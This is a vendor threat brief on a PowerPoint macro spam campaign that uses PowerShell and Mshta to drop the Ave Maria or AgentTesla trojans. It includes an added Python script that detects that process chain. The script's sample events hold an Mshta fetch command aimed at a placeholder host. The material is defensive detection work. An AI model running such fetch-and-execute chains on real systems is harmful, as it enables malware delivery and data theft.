An ongoing wave of spam is sending out emails with a dangerous PowerPoint attachment. This file contains an obfuscated macro that, once activated, uses a combination of PowerShell and Mshta to run its malicious payload — a script that downloads either the Ave Maria or AgentTesla malware.
These are two common trojans that can steal data, download further payloads, and disable Microsoft Defender. Some of these payloads are hosted on legitimate cloud services in order to appear more trustworthy. One of the additional modules that is being downloaded is an information stealer for cryptocurrency wallets, which also monitors the clipboard for any Bitcoin transaction address that could be discreetly replaced with its own.
The Acronis Advanced Email Security pack blocks malicious emails from reaching users' inboxes, while Acronis Cyber Protect’s self-defense capabilities protect the agent itself from manipulation.
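The execution chain described above (a PowerPoint macro launching PowerShell and Mshta) can be hunted for in process-creation telemetry by walking each script host's ancestry back to PowerPoint. This is an added example, not part of the original article or any Acronis product; the event field names, the sample events, and the function names are constructed assumptions.

```python
import ntpath

# Constructed process-creation events. The field names (pid, ppid, image, cmd)
# are assumptions modelled on typical EDR / Sysmon-style telemetry.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 210, "ppid": 100,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "cmd": r'POWERPNT.EXE "C:\Users\a\Downloads\constructed-sample.ppt"'},
    {"pid": 320, "ppid": 210, "image": PS, "cmd": "powershell.exe <constructed>"},
    {"pid": 430, "ppid": 320, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta.exe https://example.invalid/placeholder"},
    # Benign control: an admin shell started from Explorer must not alert.
    {"pid": 540, "ppid": 100, "image": PS, "cmd": "powershell.exe Get-ChildItem"},
]

OFFICE_PARENTS = {"powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "mshta.exe"}


def image_name(path):
    """Lower-cased file name of a Windows image path."""
    return ntpath.basename(path).lower()


def find_office_script_chains(events):
    """Return process chains where a script host descends from PowerPoint.

    Walks every ancestor, so indirect launches (PowerPoint -> PowerShell ->
    Mshta) are caught too. Assumes PIDs are unique within the event window.
    """
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for ev in events:
        if image_name(ev["image"]) not in SCRIPT_HOSTS:
            continue
        chain, cur, seen = [ev], ev, {ev["pid"]}
        while cur["ppid"] in by_pid and cur["ppid"] not in seen:  # loop guard
            cur = by_pid[cur["ppid"]]
            seen.add(cur["pid"])
            chain.append(cur)
            if image_name(cur["image"]) in OFFICE_PARENTS:
                alerts.append([image_name(c["image"]) for c in reversed(chain)])
                break
    return alerts


if __name__ == "__main__":
    for chain in find_office_script_chains(EVENTS):
        print("ALERT:", " -> ".join(chain))
```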
Acronis is a Swiss company, founded in Singapore. Celebrating two decades of innovation, Acronis has more than 1,800 employees in 45 locations. The Acronis Cyber Protect Cloud solution is available in 26 languages in over 150 countries and is used by 20,000 service providers to protect over 750,000 businesses.